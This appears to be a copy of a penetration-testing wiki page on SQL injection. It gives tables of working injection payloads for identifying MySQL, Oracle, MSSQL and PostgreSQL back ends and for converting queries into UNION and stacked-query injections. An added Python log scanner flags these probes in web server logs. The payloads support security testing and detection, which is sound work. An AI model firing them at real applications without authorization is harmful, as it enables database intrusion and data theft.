NetSPI SQL Injection Wiki
DBMS Identification (MySQL)
Detecting which Database Management System (DBMS) is in use is critical to exploiting an injection further. Without that knowledge it is not possible to determine which tables to query, which functions are built in, and which detections to avoid. A successful response to one of the queries below identifies that the corresponding DBMS is in use.
Note: The comment characters -- are placed after the query to comment out any remaining SQL that follows the injected query, helping to prevent syntax errors (in MySQL the -- must be followed by whitespace, which is why the examples end with a trailing space).
| Description | Query |
|---|---|
| SLEEP | page.php?id=1'-SLEEP(1)=0 LIMIT 1 -- |
| BENCHMARK | page.php?id=1'-BENCHMARK(5000000, ENCODE('Slow Down','by 5 seconds'))=0 LIMIT 1 -- |
| String concatenation | page.php?id=' 'mysql' -- |
| Functions | connection_id() -- row_count() -- POW(1,1) -- |
| Error messages (triggering DB errors through invalid syntax will sometimes return verbose error messages that include the DBMS name) | page.php?id=' |
General Tips
PHP applications generally use MySQL databases.
Converting queries to injections
Now that the injection has been identified, the rest of this guide contains full queries. Use the methods below to insert those queries into your injection points; SELECT @@version is used as the example query.
| Description | Query |
|---|---|
| Union | product.php?id=' UNION SELECT @@version -- |
| Union subquery | product.php?id=' UNION (SELECT @@version) -- |
| Union null (if the original query returns more than one column, add null values until the number of columns matches) | product.php?id=4 UNION SELECT @@version,null -- |
| Stacked queries (stacked queries do not always return results, so they are best used for injections that update/modify data; the table and column names are unquoted because single quotes denote string literals, not identifiers) | product.php?id='; INSERT INTO docs (content) VALUES ((SELECT @@version)) -- |
DBMS Identification (Oracle)
| Description | Query |
|---|---|
| String concatenation | page.jsp?id='||'oracle' -- |
| Functions | BITAND(1,1) -- |
| Default table | page.jsp?id='UNION SELECT 1 FROM v$version -- |
| Error messages (triggering DB errors through invalid syntax will sometimes return verbose error messages that include the DBMS name) | page.jsp?id=' |
General Tips
If the application returns an "ORA-XXXX" error, where each X is a digit, the database is Oracle.
JSP applications generally use Oracle databases.
Converting queries to injections
Now that the injection has been identified, the rest of this guide contains full queries. Use the methods below to insert those queries into your injection points; SELECT banner FROM v$version is used as the example query.
| Description | Query |
|---|---|
| Union | product.jsp?id=' UNION SELECT banner FROM v$version -- |
| Union subquery | product.jsp?id=' UNION (SELECT banner FROM v$version) -- |
| Union null (if the original query returns more than one column, add null values until the number of columns matches; banner already fills one column, so one null fewer than the total is needed) | product.jsp?id=' UNION SELECT banner,null FROM v$version -- |
DBMS Identification (MSSQL)
| Description | Query |
|---|---|
| WAITFOR Function | page.asp?id=';WAITFOR DELAY '00:00:10'; -- |
| Default variable | page.asp?id=sql'; SELECT @@SERVERNAME -- |
| String concatenation | page.asp?id='mssql'+'mssql' -- |
| Functions | @@rowcount -- SQUARE(1) -- @@pack_received -- |
| Error messages (triggering DB errors through invalid syntax will sometimes return verbose error messages that include the DBMS name) | page.asp?id=' |
| Error messages (if the id parameter is an integer, the string value of the @@SERVERNAME variable can cause a conversion error) | page.asp?id=@@SERVERNAME |
| Error messages (same conversion error, triggered through an arithmetic expression on @@SERVERNAME) | page.asp?id=0/@@SERVERNAME |
General Tips
ASP/ASPX-based applications generally use MSSQL databases.
Converting queries to injections
Now that the injection has been identified, the rest of this guide contains full queries. Use the methods below to insert those queries into your injection points; SELECT @@version is used as the example query.
| Description | Query |
|---|---|
| Union | product.asp?id=' UNION SELECT @@version -- |
| Union subquery | product.asp?id=' UNION (SELECT @@version) -- |
| Union null (if the original query returns more than one column, add null values until the number of columns matches) | product.asp?id=' UNION (SELECT @@version,null) -- |
| Stacked query (stacked queries do not always return results, so they are best used for injections that update/modify data) | product.asp?id='; SELECT @@version -- |
DBMS Identification (PostgreSQL)
| Description | Query |
|---|---|
| Sleep for 10 seconds | '||pg_sleep(10)-- |
| Default variables | SELECT current_user -- SELECT session_user -- |
| String concatenation | param='postg'||'resql' -- |
| Functions | version() -- SUBSTR() -- SUBSTRING() -- |
General Tips
Ending a query with a semicolon may cause an error (e.g. ' and 1=1;-- causes an error, but ' and 1=1-- does not).
Converting queries to injections
Now that the injection has been identified, the rest of this guide contains full queries. Use the methods below to insert those queries into your injection points; SELECT current_user is used as the example query.
| Description | Query |
|---|---|
| Union | product.asp?id=' UNION SELECT current_user -- |
| Union null (if the original query returns more than one column, add null values until the number of columns matches) | product.asp?id=' UNION SELECT current_user,null -- |
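A defender-side companion to the four DBMS identification tables and the union conversion tables above, added here as an example and not part of the NetSPI wiki: it decodes the query string of common-format web server log lines and reports which DBMS a probe is aimed at, using the distinctive tokens the tables list (SLEEP and BENCHMARK, v$version and BITAND, WAITFOR DELAY and @@SERVERNAME, pg_sleep and current_user, plus the UNION SELECT column-count probe). The log format regex and the sample log lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, unquote

# Tokens taken from the fingerprinting tables above: (regex, what a match suggests).
FINGERPRINT_RULES = [
    (r"\b(SLEEP|BENCHMARK|connection_id|row_count)\s*\(", "MySQL"),
    (r"v\$version|\bBITAND\s*\(", "Oracle"),
    (r"\bWAITFOR\s+DELAY\b|@@(SERVERNAME|rowcount|pack_received)\b|\bSQUARE\s*\(", "MSSQL"),
    (r"\bpg_sleep\s*\(|\b(current_user|session_user)\b", "PostgreSQL"),
    (r"\|\|", "Oracle or PostgreSQL ('||' concatenation)"),
    (r"@@version\b", "MySQL or MSSQL (@@version)"),
    (r"\bUNION\b\s*\(?\s*SELECT\b", "UNION column-count probe (any DBMS)"),
]

# Common/combined log format (assumed): client IP first, then the quoted request line.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

def decode_query(request_target):
    # unquote (not unquote_plus) keeps a literal '+' so MSSQL 'a'+'b' concatenation survives.
    return unquote(urlsplit(request_target).query)

def fingerprint_hints(query):
    """Return the hints whose tokens occur in a decoded query string, in rule order."""
    return [hint for pattern, hint in FINGERPRINT_RULES
            if re.search(pattern, query, re.IGNORECASE)]

def scan_log(lines):
    """Return (client_ip, request_target, hints) for every line carrying fingerprint tokens."""
    flagged = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        hints = fingerprint_hints(decode_query(m.group("target")))
        if hints:
            flagged.append((m.group("ip"), m.group("target"), hints))
    return flagged

# Constructed sample log lines (not real traffic): one probe per DBMS plus a benign request.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /page.php?id=1%27-SLEEP(1)%3D0%20LIMIT%201%20--%20 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /page.jsp?id=%27UNION%20SELECT%201%20FROM%20v$version%20-- HTTP/1.1" 500 88',
    '10.0.0.6 - - [01/Jan/2024:10:00:02 +0000] "GET /page.asp?id=%27;WAITFOR%20DELAY%20%2700:00:10%27;%20-- HTTP/1.1" 200 512',
    '10.0.0.6 - - [01/Jan/2024:10:00:03 +0000] "GET /page.asp?id=%27%7C%7Cpg_sleep(10)-- HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /product.php?id=4 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for ip, target, hints in scan_log(SAMPLE_LOG):
        print(ip, target, "->", "; ".join(hints))
```

The rules only match the tokens the wiki tables name, so they are a starting point for a detection rule rather than a complete signature set; POST bodies and double-encoded parameters are out of scope here.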